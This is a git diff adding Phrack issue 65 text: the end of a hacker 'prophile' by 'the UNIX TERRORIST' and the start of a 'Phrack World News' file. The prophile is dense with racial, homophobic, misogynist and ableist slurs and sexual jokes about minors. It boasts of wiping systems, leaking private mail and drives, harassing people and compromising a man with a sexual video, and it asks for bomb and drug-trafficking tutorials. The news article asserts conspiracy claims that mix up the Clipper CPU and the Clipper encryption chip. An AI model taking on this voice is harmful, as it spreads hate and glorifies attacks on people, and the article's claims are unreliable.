+                  Dorian Gray, The Jungle, Fear and Loathing in Las 
+                  Vegas, Catch 22, A Confederacy of Dunces, The Story 
+                  of /b/
+	 Meeting: ADMCon / France (2001)
+	 Project: The Manhattan Project, The Final Solution
+	     Sex: "You're dead if you're homely - my shit's for adults,
+	          over eight years old only"
+	   Drugs: Beta blockers and dissociatives... just about any
+	          substance featured on Erowid or T-Nation... especially 
+                  modafinil, ayahuasca, ketamine, dinitrophenol, epic 
+                  stanozololz (Winstrofl), nandrolone, Epi-Pens
+	   Music: Revolutionary/violent/mysognist/apocalyptic hip-hop
+		  Ex: Jedi Mind Tricks, Necro, Circle of Tyrants, Non
+		  Phixion, Leak Bros, Immortal Technique, Q-Unique, 
+                  Cage, Celph Titled Plastikman
+	 Alcohol: Like my women - 15-18 years old, single (malt) and on
+	          the fucking rocks
+	    Cars: blue dodge viper (vroom vroom!)
+	   Foods: Whey protein hydrolysate, Vitargo CGL, BCAA's,
+	          l-glutamine, Carlson's Fish Oil Liquid Omega-3
+	  I like: Andrei Chikatilo, 2girls1[cup/finger], Puma Swede,
+	          thinspiration, violent sporting (WEC,UFC,Pride), 
+                  solving intractable problems with violence,
+		  achieving EPIC LULZ of unprecedented magnitude
+       I dislike: Fat goths, CISSPs, fat people (in general), women with
+                  a BMI over 18, women whose thighs touch when they stand,
+		  miniature dogs, people who tailgate or drink beer out 
+                  of red plastic cups, Basshunter
+
+
+|=---=[ Your current life in a paragraph
+
+
+         I'll give you a hint... it doesn't involve getting paid to do
+	 computer security research. The only reason I would even 
+         consider using a computer anymore would be to meet women of 
+         loose moral standards on myspace, or to engage in the wholesale
+         piracy of music and video content, preferrably violent 
+         pornography. Or maybe to get directions to a strip club on 
+         mapquest... or order various scheduled substances from corrupt
+         Eastern European pharmaceutical manufacturing facilities... In 
+         fact, if you're reading my prophile because you just happened 
+         still to be reading Phrack in 2008 and stumbled upon it, then 
+         I pity you... you fucking closet homosexual.
+
+|=---=[ First contact with computers
+
+	 Studying the mysteries of gorillas.bas and nibbles.bas,
+	 oldstyle!
+
+|=---=[ Youth
+
+	 I was 300 lbs, bespectacled, and acne-stricken. I used to read
+	 copies of Dr. Dobb's Journal in P.E. Everybody hated me. Then I
+	 underwent an emergency negroplasty and decided to enact my 
+         revenge upon the world by inflicting massive verbal trauma 
+         through a medium where personal interaction is impossible and 
+         everybody feels tougher than they really are. So I installed 
+         BitchX and went on EFNET, and the rest, my friend, is history.
+
+|=---=[ Passions : What makes you tick
+
+	 I'm distinguished by an acutely defined and unparalleled sense
+	 of schadenfreude. Technology is pretty fun too (or at least it 
+         was for a while), but what really drove me harder and further 
+         was the exciting possibility of using computers to turn the 
+         life of a particular fellow human being into a living hell.
+	 So no, I wasn't that kid that used to hang out at Radio Shack
+	 pulling apart electronic equipment and reassembling it to "see 
+         how it works." Shit like that doesn't make you a "hacker" - it 
+         makes you a wannabe EE undergrad. Driving people over the 
+         precipices of depair and frustration is a great way to
+	 pass one's time, but definitely falls short of the pleasure of
+	 discrediting or humiliating or otherwise defaming and 
+         slandering the ill-earned reputations of the various charlatans 
+         and hypocrites in the scene. Publishing the mail spoolz of
+	 the wicked, archiving the hard drives of the lame, and rm'ing
+	 the weak are all activities I find inspirational. Particularly, 
+         I choose to self-medicate my anomie by proving myself smarter 
+         and stronger than others. This is the sort of thing with which 
+         we'll have to make do until we can one day stalk elk around the
+	 ruins of the Rockefeller Center or strip venison in the empty
+	 carpool lanes of some abandoned superhighway. For further 
+         information about what makes me "tick," please consult Dr. Neal
+	 Krawetz's remarkable and highly academic psychological exegesis,
+	 fully annotated to official APA formatting standards.
+
+|=---=[ Entrance in the underground
+
+	 It all began on EFNET, some time around 1998 (long before they
+	 had CHANFIX like dalnet!) in lame and lamer channels like #b4b0 
+         and #feed-the-goats. Historical note: Several incredibly 
+         diabolical and motivated individuals from b4b0 would come to 
+         rule the virtual entirety of the Interweb with an iron fist for 
+         the following decade. Yeah, I started hacking shit virtually 
+         exclusively on TCP/IP networks, and started writing exploits 
+         long after techniques like heap overflows and return-into-libc 
+         were published, so fuck you if you have a problem with the fact 
+         that I never scanned shit with toneloc or bruteforced SPRINTNET 
+         logins.
+	 
+|=---=[ Which research have you done or which one gave you the most fun?
+
+	 Writing any one of several reliable exploits for intelligently
+	 brute-forcing complex remote vulnerabilities, which all made me 
+         feel like a hacker from THE MATRIX. Especially writing a 
+         universal blind exploit for the Wu-FTPD globbing vuln for 
+         versions 2.5.x-2.6.1 (cmdtab power!), and porting the remote
+	 client for CORE-SDI's ingenious crc32 deattack backdoor to more
+	 exotic operating systems such as Solaris and IRIX (possibly the 
+         world's slowest exploit). Also, writing an LKM for dynamically 
+         loadable stack/heap execution protection on Linux.
+				    
+|=---=[ How started low-level ?
+
+	 Like most other "underground" groups out there, this one started
+	 from the flawed notion that it would somehow be cool to get a 
+         group of people together with a webpage and domain name and IRC 
+         channel and write a bunch of POC code and publish it to the 
+         public and post on sec lists for attention. It was a stupid 
+         idea.
+
+|=---=[ Personal general opinion about the underground
+
+	 Well, the underground is pretty much dead, but I guess you
+	 mostly have the security researchers out there to thank for that
+         one. However, as a delicious proof of the old adage "be careful 
+         what you wish for," security professionals have made their own 
+         demand scarce. With vulnerabilities so much harder to find,
+	 it means that random idiots out there aren't likely to find
+	 anything remotely useful by grep'ing for overflows in unsafe C 
+         functions. The first sign that things were about to dry out 
+         occurred during the format bug craze in 2000, which resulted in 
+         the systematic scanning of all varargs style functions that were
+	 incorrectly used - the first time an entire class of 
+         vulnerabilities has been nearly perfectly eradicated in a body 
+         of open source code. Slowly over time, the same thing has 
+         happened to most other memory and integer overflows, and casting
+         bugs. What happens as a result? 0day becomes a highly valued 
+         commodity. The chance of leakage decreases dramatically because:
+	 
+         1. 0day is much more valuable
+	 
+         2. Few people can find useful vulns, which decreases the amount
+	 of sharing. Additionally, smarter people usually find an 
+         intrinsically higher value in their own work than people that 
+         can't understand the exploits they're using.
+	 
+         3. "When guns are outlawed only outlaws will have guns" -
+	 Praise be to Allah and the fact that the divine mathematics of
+         exploit creation are now made sacred by entities like WIPO and 
+         the DMCA. For nearly a decade, security companies relied on FUD
+         and fearmongering, heralding the imminent spread of global 
+         cyber-warfare and e-terror. A particularly salient example of 
+         this idiocy would be the infamous Aris Threatcon, second in its
+	 contemptibility only to the Homeland Security Advisory meter. 
+         These scare tactics worked for a while, as sec. companies 
+         boosted sales of products such as firewalls, packet filters, 
+         network scanners, and other useless trash by relentlessly
+	 trumpeting the seriousness of various "hacker" threats and by
+	 strategically scaring the public with their own original 
+         (mostly stolen) advisories. Ironically, they ended up scaring 
+         legislators more than the commercial sector, and now people 
+         like Dmitry Skylarov are arrested for publishing their
+	 "astonishing!" findings. Note to security companies: you're 
+         attempting to be both the cause and the cure and we've got 
+         use for neither.
+	 
+         4. 0day auctions: Blackhats finally realize that it's a lot
+	 more lucrative to sell exploit information to shadowy interest 
+         groups. Such sales have the added benefit of preventing 
+         information dissemination, because it works against the 
+         interests of all parties involved. iDEFENSE, the first and
+	 largest name in hacking middlemanry, was forced to purchase 
+         exploits from the underground when they realized they lacked 
+         the technical skills in their meager R&D labs to find any 
+         exploits on their own. But who in their right mind would 
+         consider auctioning off vulns at Argentinian prices to a 
+         whitehat sweatshop that will just pawn their findings off as 
+         their own, and then publish them to Bugtraq - when they can make
+         the same sale to somebody in the underground for 5-10x the cost 
+         and rest assured that the vuln will stay alive?
+
+	 Nowadays, it is claimed that the Chinese and even WOMEN are
+	 hacking things. Man, am I ever glad I got a chance to experience 
+         "the scene" before it degenerated completely. And remember, kids,
+         knowing how to program or wanting really badly to figure out how 
+         things work inside doesn't make you a hacker! Hacking boxes
+	 makes you a "hacker" ! That's right! Write your local
+         representatives at Wikipedia/urbandictionary/OED and let them 
+         know that hackers are people that gain unauthorized 
+         access/privileges to computerized systems! Linus Torvalds
+	 isn't a hacker! Richard Stallman isn't a hacker! Niels Provos
+	 isn't a hacker! Fat/ugly, maybe! Hackers, no! And what is up with
+         the use of the term "cracker"? As far as I'm concerned, that term
+         applies to people that bypass copyright protection mechanisms. 
+         Vladimir Levin? HACKER. phiber optik? HACKER. Kevin Mitnick? OK, 
+         maybe a gay/bad one, but still WAS a "hacker." Hope that's clear.
+	 
+
+|=---=[ Memorable Experiences
+
+	 First box I ever owned (dropstat'd son)
+	 Watching widespread panic and hysteria grip IRC and various
+	 security mailing lists after the publication of ~el8, esp. #2 
+         and #3.
+	 The PHC Music & Film Festival, notably Joost Pol rms freebsd.cn
+	 The multi-homed attack/rm'ing of efnet irc operator "seiki,"
+	 which resulted in PHC primacy and alpha male hegemony over 
+         #phrack
+	 Preparing the memorable vitriolic speech "Wolves Among Us"
+	 from scratch, in less than 30 minutes... then attempting to 
+         deliver it without inducing fatal hilarity
+	 Becoming the Freddy Krueger of the Internet/IRC
+	 Celebrating Kwanzaa online in #darknet with assorted South
+	 African infosec luminaries
+	 Civil rights champions worldwide cheer when a Polish transsexual
+	 becomes the most recognizable expert on the vanguard of kernel 
+         rootkit (un)detection research
+	 Having my first proposed Phrack prophile rejected by humorless
+	 German staff
+	 The suceessful social engineering of hacker "dvdman" - which
+	 resulted in the retrieval of an explicit masturbatory video of 
+         aforementioned individual
+	 iDEFENSE contributors and their laughably low sell-out prices
+	 are revealed in "fake" Phrack
+	 Vomiting in my mouth (just a little bit) the first time I walked
+	 into the Alexis Park Hotel
+	 The communal rm'ing of w00w0's jobe, which became the only
+	 known time in history where the same individual was rm'ed 
+         concurrently by multiple intruders, who, up until the time
+	 of the attack, had no knowledge of each other's presences
+	 Logging into my computer, relying only on muscle memory to type,
+	 after forgetting the alphabet and being too fucked up to read 
+         the letters on my keyboard
+	 The look of surprise on the Cheshire Catalyst's face after his
+	 password was shouted at him repeatedly, at approximately 80 
+         decibels, while he was entertaining fans
+         stringz attempts to replicate ~el8, fails, and is shamed offline
+	 forever
+	 securityfocus.com adds thumbnail pictures to its original
+	 columns - I finally find out infosec rockstars such as Don 
+         Parker, Scott Granneman, and Dr. Neal rawetz really look like!
+	 Slackware founder Patrick Volkerding sends an open SOS to the
+	 world after forgetting to brush his teeth nearly results in 
+         fatal halitosis.
+	 Watching the IRC suicide/accidental deaths of rippah/electrosk0t
+	 unfold
+	 Marty Roesch reaches midlife crisis; denies own obesity and
+	 the owning of snort.org
+	 
+|=---=[ Memorable people you have met
+ 
+	 The Blue Boar, at the very first Phrack High Council Ethics
+	 Roundtable
+	 The Rain Forest Puppy (sounds like an adorable stuffed animal
+	 from Mattel(C) but dresses in shiny reflective raver clothing)
+	 Captain Crunch (No thanks du0d I don't want you to open up my
+	 chakras with a special "energy massage")
+	 Ofir Arkin, world's leading ICMP fingerprinting technologist
+	 Honey Dew Moore, child hacker prodigy and world's leading
+	 exploit cataloguer
+	 Shok, world's foremost Mormon hacker
+	 Surprisingly, some actual hackers (various members of MoD),
+	 while attending HOPE, the worst con I've ever been to
+	 The Death Vegetable, largest carbon footprint of any netizen
+	 Packet Fairy
+
+|=---=[ Memorable places you have been
+
+	 spaf's mail spool (although I'd give it back in a heartbeat
+	 for a chance to take a joyride in his electric wheelchair 
+         instead)
+	 cvs.openbsd.org
+	 s1's famous "Studio 31337" HACKING FORT
+	 Rloxley's child porn archive
+
+|=---=[ How started PR0J3KT M4YH3M ?
+
+	 The idea obviously isn't something entirely new or original. 
+         The earliest known historical precursor to Project Mayhem was
+         Erostratus, who set fire to the Temple of Artemis at Ephesus,
+	 one of the Seven Wonders of the Ancient World. Though his
+	 motives were questionable (he achieved the act merely because 
+         he had no other way of immortalizing his name), the base concept
+         was there: destroying something beautiful just for the hell of
+	 it. Note: destruction and vandalism out of ignorance and fear 
+         are decidedly less noble in nature. Obviously, there was some
+	 inspiration from the novel, Fight Club. As far as scene-related
+	 influences, there were some early precursors... the venerable 
+         e-zine "CITADEL" and some of the better work of BOW (Brotherhood
+         of Warez). ~el8 was probably the single biggest source of 
+         creative energy fueling PR0J3KT M4YH3M, and is still 
+         remembered to this day as the greatest, most revolutionary
+	 blackhat publication of all time. But what really kick-started
+	 PR0J3KT M4YH3M was the apparent lack of success of 
+         anti.security.is, a formal anti-disclosure movement constructed
+         from a lucid and cogent document illustrating why it would be 
+         better for all parties in the infosec community to stop 
+         publishing exploit code. But as the US government is fond of 
+         saying of the Taliban, it soon occurred to many of us that 
+         these whitehats, like their white-turbaned friends in 
+         Afghanistan, "respond only to violence." Enter PR0J3KT M4YH3M,
+	 a spawn off PHC's Fight Club division. All in all, PR0J3KT 
+         M4YH3M had an impressive run, resulting in the ownage of high
+	 profile whitehats including Theo de Raadt, Kevin Mitnick,
+	 and Marty Roesch. IRC servers were conquered and their 
+         operators were vanquished. Prominent "hacker" magazines were 
+         stolen and leaked prematurely. Hard drives were dd'ed, 
+         tar'ed, gzipped', gpg'ed, and shipped off to snu.ac.kr.
+	 Codes of whitehats were backdoored and published
+	 unexpectedly. Violent/offensive/sacrilegious blackhat 
+	 ASCII art was created. Heap exploitation tutorials were
+	 rebranded. Hitlists of the whitehat community were 
+         compiled. Info-security professionals were fired. Whitehat 
+         books & movies were leaked. g4yh1tl3r lived, died, and was born 
+         again. And we all had a lot of fun. 
+
+|=---=[ Things you are proud of
+
+	 Closing Captains of Crush #2 (multiple times, with finesse)
+	 Coining several catch phrases which framed the zeitgeist of
+	 the blackhat movement of the early 21st century, including 
+         "w00w00 is p00p00"
+	 Becoming the first "hacker (over 5 ft. tall) on steroids"
+	 Transcending the blood-brain barrier
+	 Reading the last 5 issues of Phrack without learning anything new
+	 Stealthily avoiding all hidden toilet/shower cams at HAL 2001
+	 Becoming the first hacker to write exploit headers in ebonics
+	 Proud author of an exploit that appears bundled with O'Reilly's
+	 "Network Security Assessment" book, after infosec genius Chris 
+         McNab deletes comments/headers and submits it for inclusion
+	 Becoming the first person to rm a box from a cellular device
+	 (while at a nightclub ala "Swordfish")
+	 Coming from a family free of mental retardation/physical birth
+	 defects
+	 Demonstrating to the world repeatedly how stupid it is to be
+	 a whitehat
+	 Triumphing over hackers such as mosthated, missnglnk, gov-boi,
+	 ben-z, ytcracker, kf, and joewee to earn the title of "blackest
+         man on efnet"
+	 Learning how to krump proficiently after watching only 15
+	 minutes of Rize
+	 Serving for several years as the High Chancellor of *.ac.kr
+	 and *.ac.jp
+	 Ordering the world's only team ~el8 tank top from cafepress.com
+	 World's fastest typer on sub-anaesthetic doses of special k
+	 Successfully masking my bipolar disorder in order to become a
+	 fully integrated and respected member of 'society'
+	 Rotating planes of polarized light counterclockwise around
+	 various enantiomers
+
+|=---=[ Things you are not proud of
+
+	 Ever having released code to the public
+	 Ever having posted to a security mailing list in which the
+	 intention of my correspondence was less than utter sarcasm, 
+         mockery, or malice
+	 Failed attempt at rm'ing def-con.org while at Defcon, due to
+	 network problems
+	 How underappreciated this prophile will inevitably be
+	 Not also ordering the "Countdown to rm" ~el8 wall clock from
+	 cafepress.com
+	 Unknowingly losing an underground ytalk speed typing competition
+	 to a rogue TIOCSTI program
+
+|=---=[ Opinion about security conferences
+
+	 There are any number of flawed reasons why people attend/speak
+	 at security conferences. If you're looking for recognition or 
+         publicity, you're probably better off committing suicide
+	 on Youtube (see "Budd Dwyer" Wikipedia for ideas).
+	 If you're looking for repulsive female companionship or fellow
+	 loser friends to socialize with "IRL," you'll probably save 
+         some time and airfare by checking your local Craigslist first.
+	 Otherwise, the proof is in the pudding. 10 years ago it would
+	 been inconceivable that there would one day be "security 
+         conferences" in retard 3rd world shitpile countries like Mexico,
+         Malaysia, and Pakistan. Countries whose only contributions to 
+         the progression of the digital age
+	 have been the vigorous repeated typing of "jajaja" and "kekeke"
+	 and "gf0rce pakistan!!!" in
+	 various IRC channels and online message boards. Apparently,
+	 high tech vocations have taken
+	 over! My suggestion is to stock up on sombreros, Nikes, and
+	 taxi cab medallions now before
+	 they become relics of the past.
+
+|=---=[ Opinion on Phrack Magazine 1985' ? 1995' ? 2005' ? '2007 ?
+	 
+         I've always thought this magazine sucked, but in regards to
+	 the specifics of the question at hand, it's probably gotten 
+         steadily worse over time. OK OK... I'm sure the editorial staff
+	 would like me to say something positive here so here's my best
+	 attempt: "PHRACK MAGAZINE - Hey, at least it's not 2600!"
+	 This will probably be the worst issue yet, but that's fine -
+	 I'm just using this prophile as a mouthpiece for my dogma of 
+         physical anabolism and moral decay.
+
+|=---=[ What you would like to see published in Phrack ?
+
+	 An article on phones! (Not VOIP!)
+	 Definitely more mail spools... a renewed focus on homemade
+	 improvised explosive devices... maybe even some tutorials on
+         drug trafficking for newbies
+		  
+|=---=[ Shoutouts to specific (group of) peoples
+
+	 Doing (R.I.P.), tr4shc4n m4n, krad, odaymaztr, Funny Bunny,
+	 module of rhino9, g4yh1tl3r, drater, the crazy Turk, Rocky 
+         the virgin hacker Jesus, zilvio, all my Icelandic friends, 
+         sk8, j & r, Hans Reiser (everybody on IRC talks about murder, 
+         but nobody actually goes through with it), everybody on asylum 
+         & its admin, my old friends from #!!ADM and #!hax, the 
+         zoroastrian insomniac prophet & his partner in crime
+ 
+|=---=[ Flames to specific (group of) peoples
+
+	 pm/gaius (hey did you know there's a facebook group for
+	 HERT now?!?), hd moore & his ersatzsploit project (we
+	 commend you on your entrepreneurial vision of turning your
+	 look-mom-i-just-got-owned tcpdump logs into exploits with your
+	 own name on them), Richard "Dick Theft" Johnson (1500+ on his
+	 SAT; abject failure at real life), The Condor, THE WAREZ D00D 
+         (your next ten bag of heroin will be cut with ricin), jobe, 
+         Philip Emeagwali (father of the supercomputer/Internet), 
+         slashdot, Valdis Kletnieks (if I can't pronounce your name, 
+         it's time to kill yourself or go back to dragging a plow in 
+         Latvia), "Dr." Neal Krawetz, Stefan Esser (currently being 
+         hunted down by European PROJECT MAYHEM operatives with 
+         instructions to sever the right hand in accordance with holy 
+         e-jihad Shariah), Eric S. Raymond (still piecing back together
+         his ~ from backups after the brutal desecration of his OSI bazaar
+         via CVS 0day), Electronic Souls, hack.co.za, xfocus, nsfocus, 
+         Souljah Boy, "Tiger Team", GNU, Jose Nazario, Luigi Auriemma, 
+         tsao[IC], divineint (I'm sure the Singaporian government would 
+         have had you caned by now for trading IRIX/VMS/DGUX/AIX/HPUX/
+         Windows src code if you weren't already in their employment), 
+         Raven (congratulations on having a vagina... it's not even a 
+         good one, but it's still better than your brain so you should 
+         probably try hooking instead of thinking for a living), Don 
+         "Beetle" Bailey, Ron Dufresne, Gadi Evron, lcamtuf, Ulf 
+         H?rnhammar, jeff moss, pete shipley & other vampire hackers, 
+         jericho, marcus ranum, chesswick & bellovin, lamo, 
+         markoff/shimomura/mitnick, theo, knuth, dijkstra & other
+	 CS theory fags, HACKER CRACKER
+
+|=---=[ Quotes			 
+
+	 "WTF SAID I WAS A TRADER?" - The Warez Dude
+	 "eye dont wipe logz" - Kareless KaRL
+	 "I'm proud to say I have committed every sin in the Decalogue." -
+	 Sir Richard Burton
+	 "irc warfare isnt very fun when u can just vanquish your f0ez...
+	 i feel like i go thru life with IDDQD on...walking thru firewalls
+         like IDSPISPOPD" - the_uT
+	 "I hate to think that all the whitehats in the world are
+	 concerned that phc members are busy hacking their home machines 
+         when people are really playing ninja gaiden and hocking off their
+         computers to buy $1000 dogs." - gayh1tler
+	 "While you were sleeping we helped ourselves" - Canaan Banana
+	 "I'm on the Zoloft to keep from killing y'all" - Mike Tyson
+	 "I've got 5 words for you: drugs smuggled in presidential
+	 baggage" - lu1g1
+	 "I guess I'm gonna fade into Bolivian" - Mike Tyson
+	 "I just want to conquer people and their souls" - Mike Tyson
+	 "My power is so discombobulatingly devastating I could feel
+	 his muscle tissues collapse under my force. It's ludicrous 
+         these mortals even attempt to enter my realm." - Mike Tyson
+	 "step in2 my e-z bake oven!" - gayh1tler
+	 "I think my mask of sanity is about to slip." - Patrick Bateman
+	 "its not nice to treat other people's boxes like toys-r-us" -
+	 unknown
+	 "With a gun barrel between your teeth, you speak only in
+	 vowels." - Fight Club
+	 "Fuck damnation, man! Fuck redemption! We are God's unwanted
+	 children? So be it!" - Tyler Durden
+	 "Eat your lima beans!" - Pavel "Papa" Sandrak
+	 "A race condition is how fast you can hit the reset button when
+	 you start hearing your hdd whine" - unknown
+	 "We will achieve samadhi while meditating over s1's studio
+	 31337 MOTD" - the_uT
+	 "Like our great leader, this kernel module selects a child and
+	 touches him in a very special way." - warez mullah, THE EMMANUEL
+	 GOLDSTEIN LKM
+	 "Cuz if you can take a fucking dick, you can take a joke" -
+	 Immortal Technique
+	 "The greatest trick the devil ever pulled was convincing the
+	 world he doesn't exist" - The Usual Suspects / Baudelaire
+	 "So I'm rapelling down Mt. Vesuvius, and my rope breaks and I
+	 begin to fall and im falling, falling. Ahhhh, I'll never forget
+	 the terror! Then I thought to myself, hey Hansel. Haven't you
+	 been smoking peyote for 6 straight days and couldn't some of
+	 this maybe in your head? " - Zoolander
+	 "Shit! If I'd known it was going to be this kind of party I'd
+	 have stuck my dick in the mashed potatoes!"
+	 "ARE YOU FUCKING RETARDED? STOP CRYING AND FUCK YOUR OWN ASS
+	 WITH IT" - facialabuse.com
+	 "So don't ever talk shit. And remember something nigga, while
+	 you rave and rant - a roach can live for nine days without its
+	 head, but you can't" - Immortal Technique
+	 "d00d thats not a LADY OF THE PEN, thats ___ from CUMFIESTA!" -
+	 unknown
+	 "Can somebody please tell me what the fuck A RED MAP is???"
+	 "i did it 4 the lulz" - ANONYMOUS
+	 "we dish out rm's like petri" - the_uT
+	 "There he goes. One of God's own prototypes. A high-powered
+	 mutant of some kind never even considered for mass production.
+         Too weird to live, and too rare to die." - HST UNF UNF
+	 "Behold I am become death, the destroyer of worlds" - Robert
+	 Oppenheimer
+	 "It is better to find 10 dead babies in 1 trash can than to
+	 find 1 dead baby in 10 trash cans." - Unknown
+	 "NIGGA, THE RM IS THE NEW EUGENICS... EUGENIX" - unknown hacker
+	 "WTF SAID I WAS A TRADER?" - The Warez Dude
+	 "For personal reasons, I do not browse the web from my computer.
+	 (I also have not net connection much of the time.)  To look
+	 at page I send mail to a demon which runs wget and mails the
+	 page back to me. It is very efficient use of my time, but it
+	 is slow in real time." - Richard Stallman
+	 "and it shows that you are a complete dork. you are disconnected
+         from reality. how can we take you for serious?" -
+	 mbalmer@openbsd.org in response to Stallman, officially winning
+	 at irony... FOREVERER
+	 "2 FAST 2 FURIOUS 4 U" - the_uT, upon winning an underground irc
+         speed typing competition
+	 
+				   
+|=---=[ Anything more you want to say 
+
+	 Looking back on my involvement in computers, I am very happy
+	 that the peak of my activity occurred right during the turn 
+         of the 20th century. Hacking was no longer as simple as manual 
+         labor (wardialing etc.) but finding vulnerabilities and writing 
+         exploits and tools was not exactly as tedious and prohibitively 
+         time-consuming as it is currently. To say that I would rather 
+         commit seppuku than adapt to the challenges of a changing world 
+         by auditing code for SQL injection vulnerabilities and 
+         client-side browser exploits is not an exaggeration. On the 
+         upside of things, hardcore pornography is now far better and 
+         more widely and freely available than ever, and productive
+	 programming like UFC can be seen on channels like Spike TV for
+	 free. Every day, more and more youngsters are born who are many
+         times more likely to contribute articles to socially useful 
+         publications such as Encyclopedia Dramatica instead of 2600. 
+         Spreading terror and wreaking havoc for "epic lulz" have been 
+         established as viable alternatives to contributing to open 
+         source software projects. If you're a kid reading this zine for
+	 the first time because you're interested in becoming a hacker,
+	 fucking forget it. You're better off starting a collection of 
+         poached adult website passwords, or hanging out on 4chan. At 
+         least trash like this has some modicum of entertainment value,
+         whereas the hacking/security scene had become some kind of 
+         fetid sinkhole for all the worst kinds of recycled academic 
+         masturbation imaginable. In summary, the end is fucking nigh, 
+         and don't tell me I didn't warn you... even though there's 
+         nothing you can do about it. 
+         
+         Good night and good luck,
+         - the UNIX TERRORIST
+
+|=[ EOF ]=|	
diff --git a/phrack65/3.txt b/phrack65/3.txt
new file mode 100644
index 0000000..374c7eb
--- /dev/null
+++ b/phrack65/3.txt
@@ -0,0 +1,1584 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x03 of 0x0f
+
+|=--------------------------------------------------------------------=|
+|=-----------------------=[ Phrack World News]=-----------------------=|
+|=----------------------------=[ by TCLH ]=---------------------------=|
+|=--------------------------------------------------------------------=|
+
+
+The Circle of Lost Hackers is looking for any kind of news related to
+security, hacking, conference report, philosophy, psychology, surrealism,
+new technologies, space war, spying systems, information warfare, secret
+societies, ... anything interesting! It could be a simple news with just
+an URL, a short text or a long text. Feel free to send us your news.
+
+We didn't get any news from the Underground since our last phrack issue,
+it means that one more time all the news reports are coming from
+friends of our's.
+
+It would be good if people who claim themself "underground" would send
+us their news...
+
+Is our underground dead?
+
+
+1. Speedy Gonzales news
+2. How is CSPP controlloing US education network?
+3. Retrospective of underground scene
+4. Killer robots
+5. Meaningful IP addresses
+
+--------------------------------------------
+
+
+--[ 1.
+
+ _____                     _
+/  ___|                   | |
+\ `--. _ __   ___  ___  __| |_   _
+ `--. \ '_ \ / _ \/ _ \/ _` | | | |
+/\__/ / |_) |  __/  __/ (_| | |_| |
+\____/| .__/ \___|\___|\__,_|\__, |
+      | |                     __/ |
+      |_|                    |___/
+ _____                      _
+|  __ \                    | |
+| |  \/ ___  _ __  ______ _| | ___  ___
+| | __ / _ \| '_ \|_  / _` | |/ _ \/ __|
+| |_\ \ (_) | | | |/ / (_| | |  __/\__ \
+ \____/\___/|_| |_/___\__,_|_|\___||___/
+ _   _
+| \ | |
+|  \| | _____      _____
+| . ` |/ _ \ \ /\ / / __|
+| |\  |  __/\ V  V /\__ \
+\_| \_/\___| \_/\_/ |___/
+
+
+
+*-[ The underground complot: when quebec scene takes too much LSD ]-
+
+http://www.mindkind.org/mindkind1011.zip
+
+
+*-[ "king of the carders" but busted ]-
+
+http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/
+
+
+*-[ "secure area" and "Microsoft" don't belong in the same sentence ]-
+
+http://www.stuff.co.nz/4269090a28.html
+
+
+*-[ Being an ethical hacker is definitely not a good idea ]-
+
+http://www.smh.com.au/news/security/police-swoop-on-hacker-of-the-year/2007
+/11/15/1194766821481.html?page=2
+
+
+*-[ When NSA teaches you how to hack ]-
+
+https://www.hackerdegree.com
+
+Do they read phrack? :)
+
+
+*-[ When Phrack is a sponsor without its permission ]-
+
+http://conference.hackinthebox.org/hitbsecconf2007kl/?page_id=65
+
+
+*-[ Terrorism excuse is good for spying business ]-
+
+http://www.corpwatch.org/article.php?id=14821
+
+SAIC...
+
+
+*-[ Entersect sounds like an interesting target...]-
+
+http://www.washingtonpost.com/wp-dyn/content/article/2008/
+04/01/AR2008040103049_pf.html
+
+
+*-[ Want to work for MI6? ]-
+
+http://news.bbc.co.uk/player/nol/newsid_6150000/newsid_6153000/
+6153092.stm?bw=bb&mp=rm&nol_storyid=6153092&news=1
+
+
+*-[ Flight "not" Simulator ]-
+
+http://www.theregister.co.uk/2008/01/07/
+boeing_dreamliner_hacker_concerns/
+
+
+*-[ This design looks familiar...]-
+
+http://hex90.org/
+
+
+*-[ After hacking your brain: hacking your heart!]-
+
+http://packetstormsecurity.org/papers/attack/icd-study.pdf
+
+
+
+--[ 2. How is CSPP controlling US education network ]--
+                        by dahut
+
+http://www.mccullagh.org/db9/d30-32/kay-rosen-holleyman-1.jpg
+
+The above picture shows Ken Kay, executive director of the Computer
+Systems Policy Project on the left and Robert Holleyman, president and
+CEO of the Business Software Alliance on the right.
+
+CSPP (www.cspp.org) was created in 1989, and later on renamed as
+Technology CEO Council. Bigger members are Applied Material, Dell, EMC,
+HP, IBM, Intel, Motorola, NCR and Unisys. All these companies together
+are generating 300 billion dollars of annual revenues.
+
+The company was made on request of the US President, to promote
+U.S. competitiveness through technology leadership. You can think
+technology is for information technology. You are wrong. It's for
+Intelligence technology.
+
+The project is two steps. First is to invent a spy chip and
+put it in every computer manufactured in US. So did Fairchild
+(http://en.wikipedia.org/wiki/Fairchild_Semiconductor) by producing the
+Clipper chip (http://en.wikipedia.org/wiki/Clipper_architecture).
+The Clipper was designed with internal circuitry to encrypt information
+and deliver backdoor capabilities, a little bit as the previous PROMIS
+software was doing with Mainframe.
+
+The Clipper was designed for RISC workstation. After a bankruptcy of
+Fairchild, and seeing that Hitachi was interested to acquire the company,
+the US government requested Intergraph to continue the project. So
+they did by starting the production of a new UNIX workstation line,
+named Interpro32 and running AT&T Unix operating system.
+
+So, the operating system was containing code to activate the secret
+part of the CPU, and access to users' data. The following declassified
+document explains to the US administration how dangerous it could
+be to continue to use the Clipper chip in conjunction with AT&T:
+http://www.softwar.net/bush.html. CIA and NSA are involved in this
+document.
+
+Now that the main US chipset and computer manufacturers are in the
+secrets of the CIA intelligence, let's go for step two.
+
+In 1996, the US president Clinton did ask to create the CEO Forum,
+managed by Ken Kay, to establish the best rules for the future
+classrooms, assuming they will be well connected to the Internet, with
+the best possible hardware. Members were Apple, Dell, IBM, Compaq, HP,
+Sun... Next, the US government did ask again to Ken Kay in 2002 to
+create the Partnership for 21st Century Skills to be at the center of US
+K-12 education by building collaborative partnerships among education,
+business, community and government leader (www.21stcenturyskills.org). It
+was a follow up to the CEO Forum.
+
+Members are:
+
+* Adobe, AOL, Apple, AT&T, Cisco, Dell, Intel, Microsoft, SAP, Oracle...
+* National Education Association, Ford Motor Company (?) and the US
+Department of Education
+
+Ken Kay is in charge of driving all these companies to install computer,
+software and networks systems in all schools of USA, as well as dictating
+the content of the courses!
+
+Thinking back to the picture in front of this article, you can make
+the connection between all software companies, the BSA company and Ken
+Kay. Thanks to the clipper chip success, they all know how to watch you!
+The cherry on the cake will be to tell you that Ken Kay is managing WWASP,
+the largest world network of special establishment for "Teens In Crisis".
+www.wwasp.com
+
+http://en.wikipedia.org/wiki/World_Wide_Association_of_Specialty_Programs_
+and_Schools
+
+Many parents are complaining against the treatment methods employed by
